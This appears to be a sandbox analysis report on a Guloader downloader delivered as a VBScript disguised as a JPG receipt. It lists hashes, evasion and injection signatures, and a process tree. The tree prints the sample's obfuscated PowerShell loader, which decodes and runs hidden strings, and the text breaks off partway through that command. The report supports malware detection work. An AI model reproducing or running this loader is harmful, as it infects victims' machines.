Analysis
-
max time kernel
91s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
02-02-2023 11:29
Static task
static1
Behavioral task
behavioral1
Sample
reciept_ 0014010303102_JPG.vbs
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
reciept_ 0014010303102_JPG.vbs
Resource
win10v2004-20221111-en
General
-
Target
reciept_ 0014010303102_JPG.vbs
-
Size
411KB
-
MD5
d26b9137f31c1c7296ea710bd71b3a59
-
SHA1
b37fcfde9230d8854a8bedb13203beffeb71df21
-
SHA256
33146615b36e5718c7e8e69269f3c5cdf3ec72b525e24550da62b360f1360d30
-
SHA512
ae88914f39a5b695003d77fe1d1bc06b3302f3956ed597125ab0f81f998b35019ec49320de833ed4201cccb98651a3e97ed142d38a84d3a4ebb1706bd8ab9ad6
-
SSDEEP
6144:JCj1ltFlJ1KxZheePFmYAcM2qQLIcK6wa31LBygR9T8nMs85HaUb4bWPJxxRBtps:Uj7tHP+3zzqVcK6egj4MJ5HaUbhv3ps
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.execaspol.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe caspol.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 29 api.ipify.org 30 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
caspol.exepid process 4852 caspol.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.execaspol.exepid process 2948 powershell.exe 4852 caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2948 set thread context of 4852 2948 powershell.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1492 4852 WerFault.exe caspol.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1412 powershell.exe 1412 powershell.exe 1452 powershell.exe 1452 powershell.exe 2948 powershell.exe 2948 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 1412 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 4852 caspol.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WScript.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 4212 wrote to memory of 1412 4212 WScript.exe powershell.exe PID 4212 wrote to memory of 1412 4212 WScript.exe powershell.exe PID 1412 wrote to memory of 1452 1412 powershell.exe powershell.exe PID 1412 wrote to memory of 1452 1412 powershell.exe powershell.exe PID 1412 wrote to memory of 1452 1412 powershell.exe powershell.exe PID 1452 wrote to memory of 2948 1452 powershell.exe powershell.exe PID 1452 wrote to memory of 2948 1452 powershell.exe powershell.exe PID 1452 wrote to memory of 2948 1452 powershell.exe powershell.exe PID 2948 wrote to memory of 4852 2948 powershell.exe caspol.exe PID 2948 wrote to memory of 4852 2948 powershell.exe caspol.exe PID 2948 wrote to memory of 4852 2948 powershell.exe caspol.exe PID 2948 wrote to memory of 4852 2948 powershell.exe caspol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\reciept_ 0014010303102_JPG.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$pretincture = """ChFPauunnpucmitLiiSpoSanNy UvHDeTMoBFu Ka{Af Ov Pe Ac VapPaaChrMyaSimNo(Tr[CoSomtmeraaiMenOvgPr]Va`$DiBFieKlrNotKrhpaeCudSa)vo;Ca Ud`$brSoukNeyUndskeTrdUnrNosOv Me=Ef Fo`$taBAledorEftSkhFoeMadHe.BlLFoeSpnWegeftmohLo;Di Tr La Sy Pa`$PaRGyeMecTroafmKomDaepynSkdSuiStnopgDe Ti=Uf MiNSeeSpwSk-BiOTabSljTeeCacPrtRe RabStyHytFueKw[An]Fl Ud(Ba`$BaSRekUnyRedPeestdTirDosSt Sh/Fr Ke2Ga)Fi;Mi Re Si Pe KrFSmoSyrDe(Sa`$OrpAmhUnaParMoaMooFehRisGe=Do0So;Sa di`$TrpBehQuaDirViaInoBuhNdsRe Sm-SelsttDr Ci`$geBBoeAnrKbtSehBreSadCe.BaLPaeLenOpgAntBahDa;Wi Ki`$flpPahUnaSerPoakloPlhPosTa+Sa=Sa2Si)Ty{Sm Re Mi Br As Al Mo Ch Ko`$boRRneDicUpoAkmFomDeeFuntedStiDinUpghe[re`$HepLghPaaakrElaMuoNohLissp/Ti2Dr]fo wr=Di Ve[SacbaoUgnInvNyeSlrgrtUn]Be:Op:ThTsuoLkBPayUntTneFo(Mi`$EsBKledirdetSyhUheDedIs.PrSInuBlbMasUntUnrIdiVanFlgDe(Ek`$FepAfhSvaBorReaHaoPahSusSm,Co Sk2Ha)Ar,Ty Fe1le6Pu)Pr;Fu Be ta`$SkRFaeEncUnoHymAlmReeGanAddLaiRunDigTh[He`$ToprihStaKnramaRooAlhCosTr/fo2Ty]Ub Va=St Be(ac`$utRSoeSucDioGlmOmmAneUnnGadUsiSinLugRh[Sh`$MapThheaarerdeaBroAnhassAc/om2Gr]un Bl-SwbUnxheoRerKr Co7Hy1Si)Ab;Di Fy Ta He Rd}Pe La[PaSSetInrDriFynAngSl]Fo[MoSBayAcsIntJoeChmDi.BiTMieFoxKatAf.SpESunAecHjoAndCaiNenAngFl]He:ma:DiABlSExCSiIreIBr.MoGbaeSytElSNjtCrrTiiBenstgUn(Fr`$FrRFoexycProPrmCamAteDonHadStiDinPsgAf)Fo;Ge}Be`$InNRaoEdiWrsBeeIn1Sp2Ma6Po0St=ReHChTklBBv Ru'Na1Lo4Sy3LiEBe3Fi4Pr3sl3tr2He2Fr2PuACa6Ej9Ph2fl3Ce2EnBDo2UdBRe'Ab;En`$DiNBroBeiDosMyeTh1Or2Un6tu1Ke=CrHHaTTrBRa Pe'Pe0HeAMi2DeEPs2In4Mo3Sy5He2Ex8Es3Sm4Sy2Se8Tr2Tu1De3Te3Pa6Ss9Vi1Ca0Bo2stEKa2wi9Fn7Vi4Ba7Xa5Ph6Pl9Ro1Sh2Vi2Ri9Ac3Be4ad2ku6Fo2ov1Ch2De2Sp0Ja9Tr2Pr6Ce3Su3Sm2DeERe3St1He2Br2Eu0ReAKu2Am2Fo3Un3Jv2TyFFl2Sa8Fr2Re3la3Ag4Sk'Tr;Di`$DrNNaoCriResCoeKo1Re2af6Si2St=VgHilTWhBLe Ol'Im0Na0Bo2Kl2Ha3Fe3Ov1Fo7Mi3Da5Af2Un8Pr2An4Sj0Ov6Ge2Dy3Ca2Ca3Ki3Bi5se2Ha2Ha3Ka4Ch3Tr4Hu'su;Ge`$SiNUfoFeicosSoeOf1ma2De6Ve3Pr=UnHKrTFuBWo Af'No1Ra4Ge3ZwEPo3Ka4Ei3Di3re2So2Ph2auAhu6Ye9Rm1de5Th3ph2pe2Pr9Sa3an3Ta2RaEBi2koAta2Ud2An6Tr9Fr0baEFo2En9Af3St3Rd2Ni2Tu3Kv5In2Na8ob3Ve7Ab1He4Sq2Sa2Ef3Ra5Ju3Re1Bi2ReEAf2Do4Na2Sk2Es3Be4Te6Ud9So0IdFRe2Ha6sl2ge9Un2un3Au2LnBHe2Bu2Tr1Pr5Un2sp2Gu2Ph1Ma'Ov;Sa`$FuNAuoEpiStsLoeTe1Mo2Bo6De4Kv=WeHBlTNoBPr Kr'En3Af4da3so3Hy3Ha5Ve2IfEPa2Pr9Af2De0In'Ov;In`$TeNNaoPaiApsOveDi1Se2Su6Va5Fo=FoHBaTNaBKe No'Wa0Un0Pr2Vo2he3Ej3Dr0YaAVi2Un8Be2Ko3Fl3Ch2Pu2CaBPo2St2Ov0GnFGu2Op6Ov2So9Vi2Ov3Un2LeBJu2Fi2Tj'Sc;Bo`$MiNBioMeiUnsDreTi1Nu2Pe6Sp6In=PaHSkTViBCe Ai'Un1Ha5an1Cu3Ae1Lo4Em3Gr7Ye2mu2Fy2Ef4Sk2CrEPa2Ca6Su2SeBVe0Te9Re2Ta6Me2OpABa2Ko2Sk6BiBKl6Ba7Sp0NoFBy2SkEMe2Gr3Mo2co2Pe0Dr5Re3TuEAl1Gr4Li2UnEKa2Be0Ci6CuBbe6Ag7So1Sk7Bu3Sm2Co2Do5En2HuBCo2WaESe2Te4In'Mi;Su`$moNStoBeiUnsYaeSa1De2Sk6Br7Py=DyHSaTNiBBa An'Un1sa5Un3Bo2Ko2So9Li3Me3an2boESw2TrAYe2Es2ru6UdBHe6As7Vi0DeAAs2Cy6Dr2kv9Ac2ga6Ch2Ud0mo2Am2Ra2Pa3Ne'Wo;Ne`$AlNUnoUnicosUneBa1Ta2Pl6Ph8Da=ViHGrTCoBAa be'Wo1Se5Me2Th2Un2Ph1My2PrBMo2fr2re2Ga4St3De3Ru2Le2Un2Ud3Pa0We3Ba2Im2Ar2VrBCo2An2Sc2Ni0Fl2Fi6Tr3So3Sp2li2Fn'Na;Na`$ScNZiomiiDesBreIn1Sh2Sl6re9Yt=trHFoTInBGr No'Sa0BlELo2Be9Pa0BeAOv2Vi2Ku2UnAEs2Sk8Be3At5Fl3ScEFr0keAMi2Un8Bo2ne3Pr3au2Ca2auBSa2Di2Fo'Hu;Ko`$RhCTehSurSmiEnsUdtGsiAeaKanKaesu0Vi=RaHCoTFtBPo pa'Kv0StAPo3MiEVe0fo3No2Mi2Ba2SiBOp2Co2Fa2ko0Tr2Me6En3Ra3ch2Il2Be1Sr3Op3InEPo3Gr7Do2Mi2Ou'Xy;Tr`$caCPahUnrEaiEdsSptJeiIdaDenReeTh1Pr=BeHsaTGrBTi Kr'Gs0Pr4Ki2hoBNo2Me6su3In4Pa3De4Tr6UnBAj6Ma7Le1ba7Al3Ru2Sl2Sv5He2ViBSt2CaEUn2Fr4Mi6frBDe6Si7Or1Di4Re2Fl2Af2Ag6Fo2SoBFa2Ja2Co2By3mi6TaBno6An7Re0No6Op2Pa9vu3Om4St2AcEOl0lu4Ol2CeBGr2Ma6Kl3te4Te3Ch4Ca6ReBTr6Te7No0po6Pa3Ha2In3Po3Bl2Ch8pl0Mo4Co2EnBVr2Sa6Ou3Fr4do3Af4Le'Tr;In`$ArCOuhAfrDiiFjsFrtBaiKaaFrnBaeEm2Fe=PeHveTDiBRo Bl'Be0FiECo2Tv9Am3Po1Tr2Br8Al2RnCMa2Mo2Em'af;Cl`$KuCSnhStrPoiArsfitSeiAnaAenDaecr3No=CaHPhTDeBTr Un'Tu1In7Bo3Ok2Ch2Sv5Ba2paBSa2AnEKr2Me4re6SuBsn6In7Ov0LeFOr2EkEKo2Co3Fi2In2Ri0Te5Oc3PuEMi1Lo4Se2VaESk2Sk0Un6ReBib6Ps7es0Pa9Ph2Re2Br3er0Sl1up4Pl2KaBSa2Ce8Sm3Wo3Fa6SuBFo6Si7Pr1Un1In2CoEPr3Ar5Fo3Sa3Ap3Ki2St2Ad6Ge2inBMi'Un;Pj`$MyCNohInrbrilasartCaiFraManSkeEk4Ca=SlHBiTRyBIl Bi'Be1Mo1In2KiEMi3Ba5Fl3in3vi3Or2Sm2Ex6sp2GuBEp0Ku6Vg2IlBSu2CrBSu2Sh8Tr2Ge4Ge'Ej;Da`$SpCUnhPrrTuiGasBetJuiUnaRenFleId5Ou=beHNeTdiBFa Te'De2Un9Co3Sy3Di2El3Pa2SkBFo2FoBAr'Ca;Pr`$AnCTehSerTriDasantShiToaBenAueAu6Di=KiHMaTStBNo De'Af0Wo9Ku3To3Ai1Mi7cu3Ou5Hy2St8Pr3Bo3Bl2Fi2Bo2Th4De3Qu3Au1Re1Va2OvEUd3Ag5Ba3Ko3Ra3Br2Ex2Pa6Tz2CuBas0GeAMy2Sa2Fo2LiAPr2Sa8Gy3ri5Sy3InEOb'Ky;Lo`$RiCNohmfrWuiBysPotSyiHeaUpnpaeDi7Ov=GaHquTSaBIm La'Sy0pyEBe0Be2Re1KoFTe'Ti;Re`$NoCNohAcrUniBysRetopiHaaAcnNoeAl8bo=BeHMoTPeBPa ho'bi1WiBMu'gr;Ov`$KlCFoaExbdeiSknCieOrtTjwSroMirAikResHr=BeHStTStBUn To'Ud1Lk2Ma1br4Sa0Do2Su1Su5Ro7Tr4Po7He5Wh'Pr;Am`$NaGReeOunWafCaounrthtColDilAbeCh=FoHPrTBuBoc Hj'Hy0Ol4Ba2Se6Mu2BiBDh2TuBSy1Ba0Tu2SuELo2Tv9Fo2Fo3Uv2Mu8Ge3Je0sc1Es7Re3Rh5Re2Ho8Rh2Tr4De0ss6Sk'Ba;TofPautinPocDutBoiPloConLu UnfKakInpTa Be{JuPSlaLerReaMamPu Hy(Gr`$GrTNuoRurQumSieSanMutPoiNolTulTheFonMa,Te Ch`$NoRReoLubAniFonCugtr)Ca Bo ph Ne da Ne;Al`$UdEErvReasunKngpoePhlApiTisIntPraFirImisnuLymTr0Ab Se=TrHabTInBFi Un'Va6Tr3Tr0Da1ar2GrBBj2Sn6Je2ExABe2DaATv2Sp2in3un4Ca2TeCFo3Sy5Rg2Ch2Ba3Lu3Ko7Re0Ud7La7Fa6Qu7zu7ReANo6As7Su6HaFJu1alCMa0Sk6Du3Bu7El3Ch7Pa0Ne3Ja2Ha8Ra2CoAFu2ph6Si2CoEAt2Di9Lo1AbAli7ReDNo7HeDSt0Tr4Li3Bu2Sp3Ba5Hy3ma5Sw2Ud2Tr2Fd9Tr3Or3Ca0Uk3Et2Sa8De2spAPr2Un6Fd2TrEFi2Ce9Su6ma9Na0Go0Ov2Sy2Af3Ph3Pe0Un6Kr3Al4Se3Un4Ek2Ph2Dr2EtAmu2Be5Ly2GrBSo2ViENo2St2Sp3De4Da6KlFEm6coESa6Xy7Sm3AlBNo6Wa7Ma1Ym0Li2SeFUn2La2Fo3Ud5Im2Gl2Sl6PrAFr0Is8Ex2Pa5Ap2KrDTe2an2Vu2St4Sk3Gr3Do6Sa7gr3UnCBy6Tj7An6El3Em1Ap8Ca6Ex9St0Ln0Fa2spBAz2Sp8Un2Do5Sp2ps6In2ErBBl0Ra6Th3Sa4Ka3An4sv2im2Ra2SpATr2Fi5Mo2QuBMe3UnEPr0Ud4Gr2Ti6Ul2Fo4Pa2GoFIn2Is2la6Ko7Se6ThAEn0Gr6Re2Co9Su2Po3ap6Di7kl6bj3Of1As8Ko6Ud9Mu0ReBSc2Bl8Ma2Yo4Un2He6Sp3Sp3St2AcEVi2Ri8Mo2La9Fi6Ce9di1Ra4Lo3Ju7fa2ReBTe2InEFr3Mo3Ko6NoFJe6Ba3Ca0Ha4An2OmFAc3Ka5De2EnEUn3Pu4Di3Pr3Fr2VaETr2ar6bi2re9Mo2Ur2Mo7stFPy6BrEAm1OpCPa6HaABe7Tr6Su1AgASn6Dr9Ar0Te2Ma3Bo6he3Fi2Nu2Pa6Fe2AfBun3Ta4In6foFar6Gr3Pl0Ou9Gi2Ta8Sk2CoEDo3Ud4Em2Un2Sv7An6Sa7Ar5Su7Ha1Lo7St7Op6pjERo6un7Ar3DoARr6FjENu6En9Ur0Co0Re2Op2Ha3Ca3Vi1Tr3Em3TrEAr3Ri7Li2Dn2Sk6RoFAf6Pa3Re0Un9Ne2Ad8Un2ScETy3Am4Am2ar2Cy7In6La7Ko5Or7La1Sb7De6Ae6SeEBu'Fd;Me&Ge(Pr`$PaCTjhTrrAfiRessktEkiAbaStnBreGa7Om)Sw Ra`$UnEBrvImaminEngNaeOvlToiSlsEstRyaPrrSoiUduCommu0Tr;Ch`$KbEErvFaaAgnSkgBoeAmlReiTisHetAtaRerreiGiuKdmwo5Sk Ha=Ci SkHprTSaBPy Du'Ca6Hj3St1Su7Sk2da6Ag2Bo6Ma3Ov4Ud2moCDi3frELu2Re9et2Un3Ta2Ce2fy2Re9sc2Ur3Eo2Nu2En7Ni6zu7No5Re7In3Gl6Ha7Ex7FoARa6Br7st6Ad3Su0Za1La2MaBMe2Gt6Re2unAUn2ovATo2Ad2So3Lo4So2QuCRe3An5Sm2Bl2So3Ou3hy7st0Pr7Do7No6Di9Ha0Il0Ky2Wo2Te3Ha3Rr0TeAEn2Sy2Sy3Ud3Oz2UvFDi2Di8Ch2Ba3Re6HuFOp6No3Ra0Co9Sl2Ka8Pl2FoENy3Sp4Mi2Me2L 7Fr6Ra7Ma5Bl7Ud1sp7Wo5In6UnBNo6Sp7Sa1NoCAt1Fo3Te3SuEca3pr7Ob2Ko2Fo1MaCBe1PiADa1UnABe6Su7My0Li7Du6ReFKv6Fo3Ka0Be9Lk2Br8de2HuERa3Tr4Un2Un2Ga7Fn6Si7In5ve7Be1Be7Af4Yd6PeBRa6Tr7Or6Ni3Te0la9Ge2Pa8El2TeEPe3Fa4Ch2Ko2Be7Ef6bi7De5Un7Fa1Sc7Hi3Te6NaEFo6DiEFy'Sk;Sk&Hy(Lo`$RaCBrhbrrGuiHosUntAgiouaSknNseRe7Di)Me pa`$EjENevspaYnnErgUdeColPaiBosPhtMyaslrUdiSuuKamIm5Gu;Su`$IdECavGraLynEkgurePolVaiSasHitHaacrreniBeuSmmKo1Ea Ho=Da ItHCrTNoBCa Sa'Re3St5Be2er2Mo3Ho3Dy3Sa2Aa3Ko5Ch2Sa9Fr6He7No6Un3sa1Op7fi2Xy6pr2Tr6Re3Te4Br2PlCDe3NoEGa2Sr9Kr2Le3Al2Ch2Bu2So9Ti2Ca3Sw2tu2Ot7Ky6An7Op5To7Pu3An6Re9Br0PeESy2Re9Sp3Ho1Re2Pe8Dy2DyCSy2Fr2Mi6BeFha6Ba3No2Ri9Un3in2Sy2ovBZe2PuBFo6NoBIn6Bi7En0My7Gr6InFNu1PyCMi1Su4te3PeEBo3Gi4Fo3To3Ca2Ka2Dr2TpAUp6Af9Gr1Fo5Ex3Li2Fi2Kr9sa3Vi3Hv2PlESm2ReAsn2sy2Es6Ja9Mo0ReEOu2Op9In3An3Ph2Ha2Se3be5Ty2Ry8My3Re7Pl1Pr4Sa2In2Um3Ga5Tr3Pr1St2DeEfy2Mi4Um2Ap2Be3Fl4st6Hi9Er0DiFFo2Ap6De2bl9Fo2Po3Sa2MaBLo2Dr2Ba1En5Sp2Re2Pr2pe1Fo1ViASw6ReFDe0Sk9Un2Ma2Fo3Ma0Ba6TiAOd0Be8La2Oz5st2UnDGe2Sk2Un2de4Ne3Vi3So6Fr7In1Re4Ac3MaEEr3En4In3Be3Pr2bl2Ti2ViAJo6Be9Bo1He5ra3Pe2Xe2Pl9Bu3fo3de2MaETr2NjAPa2Sv2In6In9Fr0InEAd2Os9Cr3St3Ur2Pr2Un3Kl5El2Tr8De3Cl7Tj1Me4Op2No2fe3In5Re3In1ma2LoEFo2bu4Av2Ge2No3Be4Ko6Ma9Sp0UnFja2Un6Ln2Aa9Up2Um3Se2inBUn2Re2Un1St5Lg2Pe2Su2Sn1Sc6irFOp6LaFDe0Tr9Cr2Me2Ra3St0Li6fiAUn0au8Po2Hr5Bi2ReDPr2Ja2Di2Ob4Re3Co3Be6Sk7An0NoEMi2Ag9Ha3Se3Re1Ta7Im3Sk3Af3Im5Un6TaELa6GrBEn6Af7Da6OpFKn6Gu3Sc0In1De2BaBen2Fo6Sp2TrAHe2NoASt2Gu2In3Pr4Ov2UnCKl3De5Sp2Be2Sp3Un3Wa7Mr0Be7Un7Fi6Tr9Dd0Ag0La2sa2Am3Tv3De0maAHe2ou2Mi3St3Mi2NeFGi2Fr8Re2Ba3Gr6VsFAn6Be3Un0Os9Se2Re8Ou2LuEGe3Gr4Pr2Us2Pr7Ph6Fe7Un5re7Bu1Sp7Of2Ka6DeEAr6VeESn6Eu9Ma0swEMi2te9Hi3Sp1Br2Hu8sp2OvCBr2Bv2Re6PrFBr6Na3Av2Mo9St3Be2Sc2PlBWh2InBDe6omBJi6fo7lo0Ch7Bo6OpFBy6En3Di1Pr3Al2Fa8Sy3Ko5Da2HeAUn2Pi2Bl2Bi9Pe3Ha3Un2SuEco2DrBSh2hiBUn2No2Po2St9Af6TiEDr6noEPo6AaEEj6HaELo6ClBMa6Ta7Re6Co3Wi1Ov5va2Ma8Gr2Sa5Sp2MoEKl2Al9In2af0La6BeEVi6FjEAj'Ef;Ga&Bi(Bu`$grCKohDorafiBosUntBoiSaaSunHyeIm7Bi)se sy`$LiEWhvBeaDinTegVieHalTaiPlsFltNoaBirDhiImuUnmNe1Un;Zo}TefDeuTinSlcKltLaiBroSwnJo SwGSmDUlTRe wa{FyPNeaUdrWiaAcmKe Af(In[SuPLgaForEtaRimfleVitFaeKorVa(AnPleoCesSaiButbiineoRande Da=Un To0th)In]Co Or[GiTOdyFlpsteSu[Br]Fo]Be In`$KuOImpHysRetStiRelMalAleNedTjeResBo,Ki[AwPCraAmrKuaDimIneRetBreMerHe(PiPNuoMosSeiPrtViiReoEdnRe Te=Pl Se1Bv)St]Va Pr[GeTBiyStpTreFo]Vi pa`$HmiConOcsByaRelLeuUnbEdrAfiTroFouTesKelInyTy Pe=Bl Sl[UdVDuoDiiSldJy]En)Gi;Sa`$BoETuvSlaTrnCogSaeNolLniChsOvtreaPerdiiSuuTemGy2fr Fa=jo EnHDbTOvBSa st'An6Sy3Ou0ex0Bo2PaBDi2Pe2St2Fa3Sc3Fo4Ra6Es7Re7CfADy6De7su1AnCCh0in6Sh3Mi7Un3Ph7Me0Ba3Bl2No8Ro2StAQa2Mo6St2ReEfl2Gu9Sk1NoASl7FeDka7AfDWi0Ga4Ea3fj2Ex3St5Hi3Ru5St2Do2Po2Pr9pi3An3Ra0Ud3Wo2Be8Ub2ByAGn2Ap6Ik2HiEAf2Ar9To6Lo9Ud0Og3Pi2Pa2Ro2In1Fi2KlEMa2Ri9Ov2Un2Br0Po3Cr3BeEUp2Bo9si2St6am2BuAMi2PhEDi2St4Un0Ax6Zy3Sa4Te3No4Ho2Se2Ch2HiASn2Pa5Re2MeBVa3StEPr6PeFBa6OvFOr0Ve9ov2Tu2Ou3Mo0Pu6FdAUn0St8st2Hi5Po2FoDIr2Re2Em2Su4Fi3is3re6Te7Os1Br4Sp3OvEre3St4St3De3Pr2Se2ke2ReABa6Op9Fo1Un5fi2an2Ak2Sp1Il2PoBcl2Sj2Fo2Ha4Pi3Sk3De2BrERa2de8My2Be9Ba6fu9Me0Gr6La3En4Ar3Af4Da2Bo2Sk2ToAFo2Sl5Ko2FoBto3SkEGa0Gu9Ge2kv6Om2PsATr2Gr2Ho6LaFFr6Sk3Nu0To9Sh2Fr8Po2ExEIn3La4bi2Br2Ge7fu6Ov7Qu5Tj7Fo1Fo7MeFBu6SpEUn6seEPr6SuBRe6Sa7Fo1AaCUn1Pa4De3NeESt3Ka4Pr3Jo3Ce2Ci2Ha2BoAIc6Sl9De1Su5Wa2Pr2mo2Sk1Ka2PsBRe2Bi2Gr2Do4St3Um3At2TrERa2Bo8Kr2Ha9Ge6Ch9En0Si2Za2QuADi2TrEEx3Bl3Sy6Ov9Re0Bu6In3Kl4Ge3Sa4He2Sk2Kr2FoAPi2Ma5ne2StBBe3NdESt0Ro5Sk3Sk2Ra2AnEpo2MaBEr2Fa3Ma2Or2Sh3Po5Va0Bu6Um2Wa4Ps2Gu4Sk2Ha2Kn3Lr4Be3Ba4Sk1QuAro7BlDHy7ElDLa1Ro5Em3En2Gu2Po9Ce6AnEve6Sv9Ba0No3Sb2Kr2Ko2Co1Fi2BaEki2No9Su2In2qu0In3St3NoESi2St9Vi2Ny6La2TeASh2SlEju2He4Ba0DeAVa2Lu8He2Lo3Va3tr2Co2AsBma2Ki2Re6MeFWo6Cu3Ca0Om9Si2de8Ty2FeEFr3Ej4Gr2Ud2at7Pr6Ko7Ka5ko7Co1Ba7BrEWa6AnBTh6Bu7Re6Na3du2La1Br2Ka6Cl2TaBOp3Is4Ma2Op2Pa6TiEHy6Pe9Bi0Sl3po2An2ka2Ud1Af2prEAf2Pi9De2Re2Ta1Vi3Ud3UrEBo3La7Da2Mi2Pa6OsFUn6En3Lo0de4Ya2AfFFo3Le5la2FlEPe3Th4St3Ov3El2NaEfo2Va6Un2Ma9Pt2Un2Ho7Fr7Ov6OvBPe6Un7sm6Oi3Se0Us4Me2GyFLu3Ba5In2OuEPi3Li4De3Sp3Kl2UnEor2Bo6St2Ba9fo2Ku2Va7Az6Fa6EnBAs6Fu7Sn1FuCSa1Sp4st3GaESu3Di4Hu3En3Fr2Af2Po2MuADr6Sh9Vi0FrACh3Kl2Un2FeBKe3Be3Sm2KiEAl2Co4Lu2Po6Mu3Ra4Me3Pe3Fl0Sk3Tr2Er2de2UdBAn2Sy2re2Is0Va2Dd6Co3Br3Vo2My2Fl1UrAVi6BeEwh'Py;no&Ex(wa`$WrCTohGorIniDesAftDeiBoaFonAbebi7Hu)Kn Be`$OvEBnvSpaLinKagFleInlUriBrsDatOvaHarSkiCruSemPe2Co;Sl`$BaEStvVoaChnCagOveSalSpiInsPhtCaaVirHeiCouunmPa3Pa No=op UdHStTNeBCo Fa'Ac6Dr3ae0Me0Bl2OuBBr2Co2Ef2ca3su3Pe4Cd6Ca9Re0Ti3Un2Lo2Pr2Sa1Co2ErEun2Du9Va2op2Sp0Mo4Eq2Ph8Fl2un9Ma3Sa4Or3Br3Vi3Ma5Af3Sr2Er2Gi4Ti3Un3No2Le8Fr3ud5pe6saFVa6Se3Di0ad9Ro2He8Im2FoEIn3Un4Sn2Pa2Su7Su6Kn7Fi5De7En1Do7Fo1St6UdBBr6Sa7Br1NoCUn1Su4Ar3FoEma3To4Is3Mi3Bo2Hi2Th2ChAPo6An9Ma1Su5Bu2Ko2Be2Pr1Tr2AcBPo2Ta2Bl2Tv4De3Pl3gr2beEDi2Da8sp2Tr9Vi6Pr9Sp0Ph4Pl2To6St2StBGa2AfBSj2EnEFo2ce9Es2At0Du0pr4Hu2An8La2Fr9an3Go1Pl2Un2de2Re9In3An3Or2AfENr2gr8Sb2Tr9Tr3To4Ra1SiASq7drDha7TaDPr1Su4Br3Su3Ma2Ps6Un2Si9Ua2Pa3By2Cl6Bo3Li5Po2To3Fr6ChBIa6Di7Is6Ko3Pe0Ur8sm3sa7Tr3In4cu3Sa3Ga2quECo2LaBUn2BoBlg2pr2Co2Dy3Mo2Re2li3Pr4Re6MiEMu6Pe9Sa1in4Pa2Sk2ku3Ko3Co0TrEbi2HoAha3He7Ph2PoBDo2He2fo2VoAPr2as2Bi2af9re3Sp3Di2Fd6Co3Ch3Ov2AuEIn2re8Al2Vg9Sy0Se1Ci2HaBVi2Sv6Ba2St0Ov3Un4Br6PsFRe6Mi3Cy0Po9hv2Ne8De2FiEHy3Ke4Me2Eq2Ac7Ty6At7De5Mi7Sk1Pe7Ho0St6SkEAr'Hu;Un&Ov(ti`$unCShhBorUniSesGetJoiHaaBunSeeLe7Gr)St Wi`$ChEPhvDuaLenWugTierelDyiTisSutCeaMrrOmiUnupamSt3Ro;Wa`$TaEudvBlaDunBrgkyeNolMoiBasTetOvaTirFaiMauSkmKv4St Ri=Fa DeHAaTVeBPr Di'Fo6Ic3Bi0Un0Uf2LiBLa2Be2Op2Bo3Sk3Bu4Ud6Me9Ji0Wh3Uk2Fa2Ko2Ex1Ac2MaEPa2ov9Te2Ex2Br0OvARe2Ge2Gr3Mi3La2UrFRe2Ki8wo2Sn3Is6MoFPr6Ti3Gt0Me4Aq2SeFwe3Tk5Ko2AfETe3ve4Em3Ma3Di2KlESe2Un6Su2No9Pa2Ab2Ha7Kr5Te6HaBWa6De7Pr6Au3Sy0In4Re2SiFGa3Co5Wr2RoEIn3Ba4Ma3Be3Ba2moEPe2Af6Sp2Ru9Ov2Fi2Su7Ha4Po6ImBom6Sk7Co6Gu3Bi2LiEUr2Be9Ui3Ea4Ro2Fl6Dk2ChBBu3Fe2Un2Ex5No3So5ta2CoEDa2In8Sh3Un2Fa3Ma4Pi2DeBOv3UnESh6FeBun6Af7Se6Ma3Ga0Lu8Pr3in7Pl3Wo4Sa3Le3Cr2DrELa2MaBMo2DeBSt2In2Am2Sl3He2Sa2Af3Im4Da6BoEBr6Pa9Ra1th4Si2Wi2Ju3Sa3De0MiECo2TeAGa3Ac7Sl2CeBPi2Be2Pe2AgAto2Ca2No2ta9Wa3Ac3Be2Un6Op3eg3Un2AlEAn2St8Gr2Sn9Kr0Em1qu2KnBun2Di6Re2Kr0Fi3Al4Bu6MiFSi6An3Om0Ts9Re2Al8Le2SkENa3re4Ac2Tu2Te7Le6Ko7Me5Ho7Mo1Un7Ho0Ob6SkEMo'Su;ju&Me(ga`$DiCEnhAgrgeiFisPrtGuiTeaUnnTeeFl7Hi)Sk 